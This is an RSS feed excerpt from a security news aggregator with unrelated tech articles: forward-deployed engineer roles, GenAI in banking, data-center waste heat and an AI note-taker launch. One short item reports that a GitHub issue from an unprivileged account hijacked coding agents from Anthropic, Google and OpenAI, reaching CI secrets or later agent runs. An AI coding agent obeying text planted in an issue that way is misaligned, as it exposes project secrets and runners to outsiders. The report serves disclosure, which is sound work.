<p class="wp-block-paragraph">AI hiring is not just an HR transformation. It is a security boundary. And it is time CIOs treated it like one.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[There are two completely different roles called ‘FDE’]]></title>
<description><![CDATA[There’s something very attractive about saying “we embed very closely with our customers and just figure it out with them”, especially since the company that started “forward deploying engineers” is growing 84% with $5B+ revenue. But “forward deployed engineer” is a vague term and means different...]]></description>
<link>https://tsecurity.de/de/3710288/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710288/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:48:03 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">There’s something very attractive about saying “we embed very closely with our customers and just figure it out with them”, especially since the company that started “forward deploying engineers” is growing <a href="https://investors.palantir.com/files/2026%20Q1%20PLTR%2010-Q.pdf">84% with $5B+ revenue</a>. But “<a href="https://en.wikipedia.org/wiki/Forward_Deployed_Engineer#cite_note-1">forward deployed engineer</a>” is a vague term and means different things depending on the business you’re running.</p>



<p class="wp-block-paragraph">I spent almost 5 years at Palantir as a forward-deployed software engineer, and Palantir’s version of an “FDE” does not make sense for most companies I now meet as an early-stage VC. Depending on the type of business you’re building, this role could broadly mean one of two things: “the product builder” or “the platform operator.” Clearly defining which bucket you fall into will make it easier to hire for this role and run your FDE org.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/nature-of-work-vs-product-leverage.png?w=1024" alt="Figure: Nature of work vs. product leverage." class="wp-image-4206317" width="1024" height="578" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<h2 class="wp-block-heading">The product builder: The OG Palantir version</h2>



<p class="wp-block-paragraph">The north star is: do whatever it takes to actually solve the user’s problem. FDEs are not just responsible for making the platform work, but also discovering what to build and building it (actually creating software) in service of the customer.</p>



<h2 class="wp-block-heading">The platform operator: Solutions + technical customer success</h2>



<p class="wp-block-paragraph">The north star is: make the product work for the customer – deploy and operationalize it. This is what most startups today really mean when they want FDEs. FDEs here configure the core platform, manage account relationships and drive adoption. This is not new – companies have always had solutions engineers, sales engineers, customer success etc., although the work looks different as FDEs are increasingly building prototypes, configuring evals and building MCPs.</p>



<h2 class="wp-block-heading">Which FDE is right for you</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/customer-size.png?w=1024" alt="Figure: Customer size." class="wp-image-4206316" width="1024" height="457" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph">For most situations, hiring product builder FDEs is a mistake.</p>



<p class="wp-block-paragraph">At scale, the FDEs should be the platform operator. It’s hard to have FDEs build and maintain highly custom product features, especially as the company scales. Over time, the custom product surface area distracts from building the core product, even though AI coding tools make it easy to ship new features quickly and maintain them.</p>



<p class="wp-block-paragraph">Many fast-growing AI startups recognize these constraints and structure the FDE role more like the platform operator. This also allows them to have 5-10 accounts per FDE, which is a much higher ratio than Palantir had (at least in 2023). Even the Palantir FDE role has evolved to look more like the platform operator.</p>



<p class="wp-block-paragraph">There are, however, situations when your FDEs should be the product builder archetype.</p>



<h3 class="wp-block-heading">1. You have very large customers (F500 scale)</h3>



<p class="wp-block-paragraph"><strong>Technical complexity</strong>: Large customers have complex environments with legacy infrastructure that often requires “out-of-platform” engineering work. I often encountered bespoke data infrastructure, privacy requirements, etc. at various Palantir customers that required me to build “out-of-platform” connectors, UIs and backends.</p>



<p class="wp-block-paragraph"><strong>Organizational inertia and trust</strong>: Serving large enterprises is about building trust. In short time periods, overfitting product to a specific user/workflow is often what delivers the most value, builds trust and helps organizations get over the inertia of moving away from Excel and legacy software tools that are part of their day-to-day workflow. For AI-native startups, it’s arguably even more important to invest in doing “unscalable” development with engineering boots on the ground, as it helps solidify your right to exist and eventually expand the customer relationship.</p>



<h3 class="wp-block-heading">2. You have many ICPs and workflows</h3>



<p class="wp-block-paragraph">If you have a broad range of ICPs and workflows that you serve, your product probably is not walk-up usable on day 1 of deployment. The short-term hacky things that product builder FDEs build to make the product work for these heterogeneous users/workflows will help you shape the product long-term.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/overfit-products.png?w=1024" alt='Figure: "Overfit" products.' class="wp-image-4206313" width="1024" height="570" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph">Note: see Palantir Foundry’s architecture <a href="https://www.palantir.com/assets/xrfr7uokpv1b/mhoyY4c8vdVlJhulDStk2/a7340768109c8e8d79d00b4cb99d8e70/Whitepaper_-_Foundry_2022.pdf">here</a>.</p>



<p class="wp-block-paragraph">This was a big reason why Palantir FDEs were more like product builders (and are still able to – see the <a href="https://jobs.lever.co/palantir/dab396d4-2f14-4796-aac0-0d82883dccf0">Forward Deployed Software Engineer job profiles</a> as an example). The vision for Foundry was to be the operating system for an enterprise’s critical decisions – inherently multiple industries, users and workflows. A lot of FDE-led development showed that solving many of these use cases required complex data integrations, which led to the early versions of Foundry being best-suited for complex data integrations and building a customer’s “<a href="https://blog.palantir.com/ontology-finding-meaning-in-data-palantir-rfx-blog-series-1-399bd1a5971b">Ontology</a>”. Similarly, FDEs like myself built custom frontend applications for fraud analysis, pricing, etc. As certain patterns of what these applications required became more clear, they were centralized into an application-layer product.</p>



<h2 class="wp-block-heading">Who you should hire</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/who-you-should-hire.png?w=1024" alt="Figure: Who you hire." class="wp-image-4206314" width="1024" height="464" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/why-hire.png?w=1024" alt="Figure: Why hire one vs. the other." class="wp-image-4206315" width="1024" height="456" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Kabir Sial</p></div>



<p class="wp-block-paragraph"><strong>Platform operator</strong>: There is a much broader set of people you could hire, testing for technical fluency (e.g., being good at data analysis, complex Excel work, even SQL), product intuition and an inclination to build customer relationships. Backgrounds like technical customer success, solutions engineering, software engineering, product management and consulting are all strong fits.</p>



<p class="wp-block-paragraph"><strong>Product builder</strong>: You want candidates that are high ownership and missionary software engineers, or technical PMs who want to ship products themselves.</p>



<p class="wp-block-paragraph">Hiring for these profiles, especially product builders, is hard. It’s worth calling out two things that helped Palantir hire software engineers into what might be considered a less sexy role.</p>



<ol start="1" class="wp-block-list">
<li><strong>Culture of building at the edge</strong>: Strong engineers are motivated to build things. Palantir gave FDEs a lot of ownership to build products, which is why much of the core product leadership was former FDEs.</li>



<li><strong>Cult built around mission</strong>: Internally, there was a cult-like devotion to the mission. Everyone always talked about why outcomes were far more important than software, and why most companies building tools had it wrong. I’ve never been at a company where people feel so closely bonded around a mission.</li>
</ol>



<p class="wp-block-paragraph">As founders building AI startups think about hiring FDEs, it’s worth being specific about your culture and asking: Am I just hiring people to support development teams, or am I hiring people to shape and build product? It’s hard to get software engineers (even today) to be excited about an FDE role that might just be technical customer success.</p>



<h2 class="wp-block-heading">What FDEs should be doing (regardless of archetype)</h2>



<p class="wp-block-paragraph">You’ve hired the right people. How do you best leverage your team of FDEs?</p>



<p class="wp-block-paragraph">FDEs were Palantir’s way of delivering outcomes rather than tools. AI-native startups can take this much further and FDEs can help in a few unique ways by leveraging their proximity to customers.</p>



<ol start="1" class="wp-block-list">
<li><strong>Find the most critical workflows</strong>: As AI lowers the cost of producing software, companies will face a lot more competition. FDEs at AI startups should be constantly finding ways to serve the most critical workflows for a customer and paying attention to how customers do work across newer and legacy tools. For example, FDEs at Harvey should pay attention to which workflows are in Westlaw, which ones are moving to ChatGPT/Claude, and how the Harvey product can stay ahead.</li>



<li><strong>Build around nondeterminism</strong>: In more regulated environments, FDEs should be hyper-focused on making products reliable for specific use cases <a href="https://www.anthropic.com/engineering/demystifying-evals-for-ai-agents">using evals</a> and configs. Previously, product reliability lived with product and support. As companies provide outcomes instead of tools, configuring products appropriately and managing evals shifts towards FDE teams.</li>
</ol>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beyond chatbots: How embedded GenAI is transforming banking application development]]></title>
<description><![CDATA[Business application development is entering a new operating model. The traditional approach of gathering requirements, designing screens, writing services, integrating systems, testing, fixing defects and preparing release documentation still exists, but it is no longer sufficient for enterprise...]]></description>
<link>https://tsecurity.de/de/3710290/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710290/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:48:03 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Business application development is entering a new operating model. The traditional approach of gathering requirements, designing screens, writing services, integrating systems, testing, fixing defects and preparing release documentation still exists, but it is no longer sufficient for enterprises that need speed, traceability, resilience and regulatory confidence at the same time. Hyperautomation brings a broader discipline to this challenge. It combines workflow orchestration, intelligent document processing, robotic automation, API-led integration, process mining, test automation, observability and artificial intelligence into a connected delivery fabric. With embedded Generative AI, this fabric becomes more adaptive because applications can interpret natural language, summarize complex data, generate explanations, detect exceptions and support decision workflows rather than merely execute predefined rules.</p>



<p class="wp-block-paragraph">In banking, this shift is especially meaningful. Banks operate across dense application landscapes: trade reporting platforms, wealth management portals, core banking systems, investment banking applications, digital compliance engines, reconciliation utilities, operational dashboards, audit repositories and daily, weekly and monthly reporting platforms. Each of these areas has its own data models, control points, integration patterns, validation rules, exception paths and regulatory obligations. Hyperautomation does not replace engineering discipline; it strengthens it by making business intent, technical execution, control evidence and continuous improvement part of the same lifecycle.</p>



<h2 class="wp-block-heading">From automation to hyperautomation in banking applications</h2>



<p class="wp-block-paragraph">Automation usually addresses a specific task: moving data from one system to another, generating a report, running a batch job or validating a transaction against a rule. Hyperautomation goes further. It looks at the complete business outcome and asks how the entire chain can be streamlined, governed, observed and improved. For example, a trade reporting process may begin with transaction capture, enrich the trade with reference data, validate regulatory fields, identify breaks, generate a submission file, transmit it to a regulator or trade repository, monitor acknowledgements and preserve audit evidence. A narrow automation script may accelerate one step, but a <a href="https://www.gartner.com/en/documents/6454507">hyperautomated design</a> coordinates the complete flow, including exception handling and evidence generation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/figure-Figure-automation-vs-hyperautomation.png?w=1024" alt="Figure: Automation vs. hyperautomation." class="wp-image-4206308" width="1024" height="775" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p class="wp-block-paragraph"><strong>Figure: Automation vs. hyperautomation</strong></p>



<p class="wp-block-paragraph">Embedded Generative AI adds a <a href="https://assets.ctfassets.net/5965pury2lcm/65QHMnfLGaRJzJ0sX5982o/520b5f0a9745aecc8730c645994e3a3b/Forrester_Study_-_AI_And_The_Next_Generation_of_Software_Testing.pdf">new layer of intelligence</a>. Instead of forcing every user interaction into rigid screens and codes, business applications can accept natural language prompts, interpret document content, summarize cases, generate draft responses, explain anomalies, produce test scenarios and create release notes. In a banking environment, this intelligence must be carefully bounded. Every AI-assisted action should be traceable, explainable, reviewable and aligned with data privacy, model risk, information security and regulatory expectations. The goal is not uncontrolled autonomy; the goal is governed acceleration.</p>



<h2 class="wp-block-heading">Banking application components suitable for hyperautomation</h2>



<p class="wp-block-paragraph">A modern banking application is rarely a single monolithic system. It is a composition of business capabilities, integration services, workflow engines, data pipelines, user experience layers, analytics models, control dashboards and audit stores. Hyperautomation can accelerate the development and integration of these components by turning repetitive engineering work into <a href="https://www.everestgrp.com/report/egr-2024-31-v-6318/">reusable patterns</a> and by embedding intelligence directly into business processes.</p>



<ul class="wp-block-list">
<li><strong>Trade reporting applications:</strong> Generative AI can help map trade attributes to regulatory fields, explain validation failures, summarize rejected submissions and generate test cases for reporting scenarios. Hyperautomation can orchestrate enrichment, validation, submission, acknowledgement tracking and evidence archival.</li>



<li><strong>Wealth management platforms:</strong> Advisors can use embedded AI to summarize client portfolios, generate suitability narratives, identify missing documents and prepare personalized investment review notes. Automation can coordinate onboarding, risk profiling, document verification, portfolio rebalancing workflows and client communication approvals.</li>



<li><strong>Core banking applications:</strong> Account opening, loan servicing, deposits, payments, interest calculations and customer maintenance can benefit from automated validations, intelligent forms, workflow routing and natural language assistance for operations teams. AI can explain account events or transaction exceptions in plain language.</li>



<li><strong>Investment banking systems:</strong> Deal pipelines, research workflows, underwriting processes, trade lifecycle functions and risk calculations require strong coordination across front-office, middle-office and back-office platforms. Hyperautomation can standardize approvals, documentation, exception resolution and control evidence across these stages.</li>



<li><strong>Digital compliance applications:</strong> Compliance teams can use AI to summarize policy obligations, compare regulatory changes with internal controls, classify alerts, draft investigation notes and produce evidence packs. Automation ensures routing, approvals, segregation of duties, audit trails and regulatory reporting timelines are consistently enforced.</li>



<li><strong>Reconciliation platforms:</strong> AI can assist in matching narratives, explaining breaks, clustering exception patterns and suggesting resolution actions. Hyperautomation can pull data from ledgers, statements, payment processors, trading systems and data warehouses, then route unresolved breaks to the right teams.</li>



<li><strong>Reporting and audit applications:</strong> Daily, weekly and monthly reports can be generated through controlled data pipelines, automated quality checks, narrative generation, variance explanations and approval workflows. Audit applications can preserve lineage, approvals, source extracts, model outputs and control attestations.</li>
</ul>



<h2 class="wp-block-heading">Embedded generative AI as an application capability</h2>



<p class="wp-block-paragraph">Embedding Generative AI into business applications should be treated as an architectural capability, not as a decorative chatbot. A banking application may use AI for search, summarization, reasoning support, content generation, code generation, policy interpretation or anomaly explanation. Each use case requires clear boundaries. The application must know which data the model can access, which actions require approval, what evidence must be captured and where deterministic controls must override probabilistic <a href="https://www.idc.com/resource-center/generative-ai/">suggestions</a>.</p>



<p class="wp-block-paragraph">For example, in trade reporting, an embedded AI assistant can explain why a transaction failed validation and suggest likely fields to review. However, the final correction should pass through rule-based validations, maker-checker approval and audit logging. In wealth management, AI may draft a client review note based on portfolio movements and risk profile, but the advisor must verify suitability, disclosures and final communication. In reconciliation, AI can propose likely matches or categorize break reasons, while the system preserves the original data, confidence score, reviewer action and final resolution path.</p>



<h2 class="wp-block-heading">Hyperautomating the product development lifecycle</h2>



<p class="wp-block-paragraph">The Product Development Lifecycle can itself become hyperautomated. Instead of treating ideation, analysis, design, development, testing, security review, release and operations as disconnected phases, enterprises can create an AI-assisted delivery loop where every stage produces structured artifacts that the next stage can consume. Platforms such as GitHub Copilot, Claude Code or Claude Cowork-style agentic development environments and OpenAI Codex can support this movement by helping teams reason over requirements, generate code, create tests, review changes, modernize legacy modules and produce <a href="https://www.cio.com/article/1307309/the-generative-ai-revolution-is-transforming-how-banks-work.html">documentation</a>. Their value increases when they are connected to repositories, issue trackers, design documents, build pipelines, test suites, security scanners, observability data and enterprise knowledge bases.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>PDLC Stage</strong></td><td><strong>Hyperautomation Opportunity</strong></td><td><strong>AI-Assisted Outcome</strong></td></tr><tr><td>Business discovery</td><td>Process mining, domain interviews, regulatory mapping, backlog creation</td><td>Structured epics, user stories, acceptance criteria, process maps and control requirements</td></tr><tr><td>Architecture and design</td><td>Reference architectures, API contracts, data models, event flows, security patterns</td><td>Architecture options, integration blueprints, threat-model prompts and design decision records</td></tr><tr><td>Development</td><td>Code generation, service scaffolding, UI component creation, data pipeline templates</td><td>Review-ready code increments, reusable components, migration utilities and integration adapters</td></tr><tr><td>Testing</td><td>Unit, integration, regression, performance, compliance and synthetic data testing</td><td>Generated test cases, defect reproduction steps, test automation scripts and coverage summaries</td></tr><tr><td>Security and compliance review</td><td>Static analysis, dependency checks, policy validation, evidence capture</td><td>Risk explanations, remediation suggestions, control traceability and approval evidence</td></tr><tr><td>Release and deployment</td><td>CI/CD orchestration, environment promotion, release notes, rollback preparation</td><td>Automated deployment packs, release summaries, operational checklists and change records</td></tr><tr><td>Operations and feedback</td><td>Observability, incident analysis, user feedback mining, backlog refinement</td><td>Incident summaries, root-cause hypotheses, improvement stories and reliability recommendations</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Role of GitHub Copilot, Claude Cowork and Codex</h2>



<p class="wp-block-paragraph">GitHub Copilot is useful where developers need assistance inside the engineering flow: explaining code, generating functions, proposing tests, reviewing pull requests and helping teams move from issue to implementation. In a banking PDLC, it can accelerate microservice creation, API integration, batch processing logic, reconciliation rules, regulatory validation routines and UI workflows. When used with repository context and proper review discipline, it can reduce the time developers spend on repetitive coding while preserving human accountability for design and correctness.</p>



<p class="wp-block-paragraph">Claude Cowork or Claude Code-style agentic environments are valuable for multi-file reasoning, refactoring, debugging and documentation-heavy engineering work. Banking applications often contain deep domain logic scattered across services, configuration files, stored procedures, integration scripts and test suites. An agentic coding assistant that can understand a wider codebase context can help engineers analyze dependencies, prepare modernization plans, update multiple files coherently and draft explanations for reviewers. This is particularly useful in core banking modernization, trade reporting rule updates and compliance workflow refactoring.</p>



<p class="wp-block-paragraph">OpenAI Codex can support issue-to-pull-request workflows, test generation, code review, bug reproduction, migration activities and broader software engineering tasks across the lifecycle. In a hyperautomated PDLC, Codex-like agents can be assigned well-scoped work items, asked to inspect failing tests, propose fixes, create regression coverage and summarize the change for human reviewers. The important design principle is to keep agents inside controlled boundaries: clear prompts, repository permissions, test gates, approval workflows and traceable outputs.</p>



<h2 class="wp-block-heading">Integration architecture for hyperautomated banking applications</h2>



<p class="wp-block-paragraph">A practical architecture begins with business capability decomposition. Each banking domain should be expressed as a set of bounded capabilities such as customer onboarding, account maintenance, trade enrichment, exception management, portfolio review, control attestation, report generation and audit retrieval. These capabilities should be exposed through APIs, events, workflow tasks, data products and user interfaces. Hyperautomation then connects these capabilities using orchestration engines, event streams, rules engines, AI services, RPA connectors where legacy integration is unavoidable and observability layers that capture business and technical telemetry.</p>



<p class="wp-block-paragraph">The embedded AI layer should sit behind a secure application service boundary. It should use retrieval-augmented generation where approved policies, product rules, application documentation and regulatory mappings are retrieved from trusted sources. It should avoid uncontrolled exposure of sensitive customer information. Prompt templates, response validation, redaction, grounding checks, model monitoring and human-in-the-loop approval should be part of the production design. In banking, the most successful AI pattern is often not full automation but <a href="https://www.everestgrp.com/report/egr-2024-31-v-6318/">assisted</a> decisioning with strong controls.</p>



<h2 class="wp-block-heading">Example: Hyperautomated reconciliation and reporting flow</h2>



<p class="wp-block-paragraph">Consider a reconciliation application that compares ledger balances, payment files, trade settlement records and external statements. In a conventional model, operations teams spend significant time downloading files, running macros, investigating mismatches, documenting break reasons and preparing status reports. In a hyperautomated model, data ingestion is scheduled and monitored, schema checks run automatically, matching engines classify obvious matches, AI assists with ambiguous narratives, exceptions are routed through workflow queues and dashboards update in near real time. At the end of the day, the system can generate a draft operations <a href="https://www.pwc.com/us/en/industries/financial-services/library/hyperautomation-gen-ai-in-banking.html">report</a> explaining unresolved breaks, aging trends, risk exposure and pending approvals.</p>



<p class="wp-block-paragraph">The same pattern can extend to daily, weekly and monthly reporting. Data quality rules validate inputs, report templates are populated automatically, AI generates narrative commentary on variances, reviewers approve or amend explanations and the final report is archived with lineage and approvals. Audit teams can later retrieve not only the report but also the source extracts, transformation logs, exception history, reviewer decisions and AI-generated drafts. This creates a richer control environment than manual reporting because evidence is captured by design rather than reconstructed later.</p>



<h2 class="wp-block-heading">Governance, risk and control considerations</h2>



<p class="wp-block-paragraph">Hyperautomation in banking must be designed with governance from the beginning. The development team should define which activities can be automated, which can be AI-assisted and which must remain under human approval. Source code generated by AI must pass normal engineering controls, including peer review, static analysis, dependency scanning, secure coding checks, test execution and production readiness review. Business outputs generated by AI, such as compliance narratives or client-facing explanations, should be <a href="https://www.pwc.com/us/en/industries/financial-services/library/hyperautomation-gen-ai-in-banking.html">reviewed</a> where regulatory or reputational risk is material.</p>



<p class="wp-block-paragraph">Data governance is equally important. AI-enabled applications must respect data classification, residency, retention, masking and access policies. The model should not become an uncontrolled channel through which confidential customer, trading or employee information can leak. Every prompt, retrieved source, generated response, user action and final decision may need to be logged depending on the use case. For audit applications, this traceability is not optional; it is the foundation of trust.</p>



<h2 class="wp-block-heading">Operating model for AI-native PDLC</h2>



<p class="wp-block-paragraph">A hyperautomated PDLC requires changes in team behavior. Product owners should write requirements in a structured manner so that AI tools can generate better stories, acceptance criteria and test scenarios. Architects should maintain living decision records, reference patterns and integration standards that AI agents can use as context. Developers should learn prompt discipline, context packaging and review techniques. Test engineers should focus on coverage strategy, synthetic data, compliance scenarios and defect prevention rather than only manual execution. Operations teams should feed incident <a href="https://www.cio.com/article/1307309/the-generative-ai-revolution-is-transforming-how-banks-work.html">learnings</a> back into the backlog so the system improves continuously.</p>



<p class="wp-block-paragraph">The role of human experts becomes more important, not less. AI can draft, generate, compare and suggest, but domain judgment remains essential. A trade reporting specialist understands regulatory nuance. A wealth advisor understands client suitability. A core banking architect understands transaction integrity. A compliance officer understands control interpretation. Hyperautomation works best when it amplifies these experts and removes repetitive friction around them.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">Hyperautomation in business application development is not simply a faster way to write software. It is a new way to connect business intent, engineering execution, operational control and continuous learning. In banking, where applications must be reliable, explainable, secure and compliant, the combination of embedded Generative AI and disciplined automation can transform how applications are designed, built, integrated, tested, released and operated. Trade reporting, wealth management, core banking, investment banking, compliance, reconciliation, reporting and audit functions can all benefit when AI is embedded responsibly and automation is orchestrated across the complete lifecycle.</p>



<p class="wp-block-paragraph">Platforms such as GitHub Copilot, Claude Cowork or Claude Code and OpenAI Codex can play an important role in this transformation by accelerating analysis, development, testing, review, modernization and documentation. Their greatest value appears when enterprises treat them not as isolated productivity tools but as part of a governed, AI-native PDLC. The future of banking application development will belong to teams that can combine human expertise, reusable engineering patterns, intelligent automation and strong governance into one coherent delivery model.</p>



<p class="wp-block-paragraph"><em>This article was made possible by our partnership with the IASA </em><a href="https://chiefarchitectforum.org/" target="_blank" rel="noreferrer noopener"><em>Chief Architect Forum</em></a><em>. The CAF’s purpose is to test, challenge and support the art and science of Business Technology Architecture and its evolution over time as well as grow the influence and leadership of chief architects both inside and outside the profession. The CAF is a leadership community of the </em><a href="https://iasaglobal.org/" target="_blank" rel="noreferrer noopener"><em>IASA</em></a><em>, the leading non-profit professional association for business technology architects.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Polish data center plans to send its waste heat to the neighbors]]></title>
<description><![CDATA[As Europe swelters in a heatwave, residents probably don’t want to hear about ways to make their homes even hotter, but that’s what Polish property developer Citylink is talking about, with plans to dump waste heat from a new data center in Wrocław into the municipal district heating network.



...]]></description>
<link>https://tsecurity.de/de/3710259/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710259/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:47:17 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">As Europe swelters in a heatwave, residents probably don’t want to hear about ways to make their homes even hotter, but that’s what Polish property developer Citylink is talking about, with plans to dump waste heat from a new data center in Wrocław into the municipal district heating network.</p>



<p class="wp-block-paragraph">Citylink is designing the data center so that heat from servers can be recovered instead of being dissipated via cooling systems — and as the data center grows, any increase in computing power will mean more energy available for recovery.</p>



<p class="wp-block-paragraph">The collaboration with local power company Kogeneracja will provide “valuable experience in designing and operating modern data centers, with a particular focus on infrastructure dedicated to AI nodes,<em>” </em><a href="https://city-link.pl/en/heat-from-servers-could-power-wroclaw-citylink-and-kogeneracja-s-a-launch-collaboration/" target="_blank" rel="noreferrer noopener">said Michał Starybrat, development director at Citylink</a>.</p>



<p class="wp-block-paragraph">“The dynamic growth of the artificial intelligence and cloud technology markets generates unprecedented demand for computing power, this collaboration demonstrates how modern digital infrastructure can actively contribute to building the energy ecosystem of the future,” he added.</p>



<p class="wp-block-paragraph">This type of initiative is not new. There have been <a href="https://www.newcivilengineer.com/latest/data-centres-could-join-energy-ecosystem-as-report-presents-use-case-for-wasted-heat-16-10-2025/" target="_blank" rel="noreferrer noopener">similar projects in the UK</a> and <a href="https://www.reseller.co.nz/article/2503421/spark-aims-to-use-dc-heat-to-warm-a-new-north-shore-surf-spot.html">in New Zealand,</a> but with warnings that <a href="https://www.networkworld.com/article/4153403/no-joke-data-centers-are-warming-the-planet.html">data centers are contributing to the warming of the planet</a>, there may well be a lot more organizations looking to deploy that excess heat more fruitfully in the future.</p>



<p class="wp-block-paragraph">However, announcing it during a heatwave may not be the most politically sensitive approach to take.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Code and Gemini CLI Flaws Let a GitHub Issue Reach CI Workflow Secrets]]></title>
<description><![CDATA[A GitHub issue opened by an account with no repository privileges was enough to execute code on the CI runners behind Anthropic's and Google's own coding-agent repositories. On OpenAI's, it was enough to hijack the next agent run.

Novee Security ran the attack against each vendor's agent in the ...]]></description>
<link>https://tsecurity.de/de/3710206/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710206/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:51 +0200</pubDate>
<content:encoded><![CDATA[A GitHub issue opened by an account with no repository privileges was enough to execute code on the CI runners behind Anthropic's and Google's own coding-agent repositories. On OpenAI's, it was enough to hijack the next agent run.

Novee Security ran the attack against each vendor's agent in the configuration that the vendor ships by default, and presented the work at Black Hat USA on August 5.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wispr moves beyond AI dictation with note-taking assistant]]></title>
<description><![CDATA[Wispr, the startup behind dictation tool Wispr Flow, has created an AI note-taking assistant that records meetings and generates conversation summaries for users.



The Wispr Flow Notetaker tool “captures your meetings so you can stop splitting your attention between listening and writing things...]]></description>
<link>https://tsecurity.de/de/3710152/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710152/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:40 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Wispr, the startup behind <a href="https://www.computerworld.com/article/4107331/wispr-ceo-interview-post-keyboard-office.html">dictation tool Wispr Flow</a>, has created an AI note-taking assistant that records meetings and generates conversation summaries for users.</p>



<p class="wp-block-paragraph">The Wispr Flow Notetaker tool “captures your meetings so you can stop splitting your attention between listening and writing things down,” said Sahaj Garja, Wispr CTO and co-founder.</p>



<p class="wp-block-paragraph">Notetaker starts recording with one click, and doesn’t require a bot to attend a video or voice call. It can also be used to capture in-person conversations.</p>



<p class="wp-block-paragraph">The software has three key functions. Before a call, Notetaker displays a meeting brief with information such as meeting purpose and background of participants.</p>



<p class="wp-block-paragraph">Once the meeting starts, a live transcript displays the dialogue text and labels speakers. A “what did I miss?” button provides a summary of talking points from the previous few minutes.</p>



<p class="wp-block-paragraph">Finally, post-meeting, Notetaker generates a more detailed summary organized by topic that includes information such as key dates, decisions, and next steps. Users can search across notes from previous meetings in the Notetaker app. “Over time your meeting history stops being a folder of documents you have to go find and becomes something you can ask questions of,” said Garja.</p>



<p class="wp-block-paragraph">Notetaker integrates with AI assistants such as Anthropic’s Claude and OpenAI’s ChatGPT via model context protocol. This allows users to connect outputs such as transcripts and summaries “into how you already work, instead of sitting in a separate app,” said Garja.</p>



<p class="wp-block-paragraph">With Notetaker, Wispr competes in an increasingly busy market for AI note-taking apps that includes Fireflies, Granola and Otter.</p>



<p class="wp-block-paragraph">Wispr <a href="https://wisprflow.ai/post/wispr-flow-notetaker" target="_blank" rel="noreferrer noopener">claims</a> Notetaker can produce more accurate transcripts than existing tools, partly because of the additional context it uses during transcription. It uses the same personal dictionary from Wispr Flow that includes acronyms, products, and preferred spellings, and can also draw on other sources such as calendar information to understand the purpose of a meeting and help ensure speakers are labelled correctly.</p>



<p class="wp-block-paragraph">Before generating the final summary, Notetaker also re-reads the live meeting transcript and combines it with additional context to create a more accurate final output, Garja said.</p>



<p class="wp-block-paragraph">Notetaker is the first new product launched by Wispr, which was founded in 2021 and has since <a href="https://wisprflow.ai/new-funding" target="_blank" rel="noreferrer noopener">raised</a> $81 million in funding.</p>



<p class="wp-block-paragraph">“We didn’t set out to build a dictation app,” said Garja. “The mission has always been to reshape how people interact with their devices, and dictation was the fastest way in.”</p>



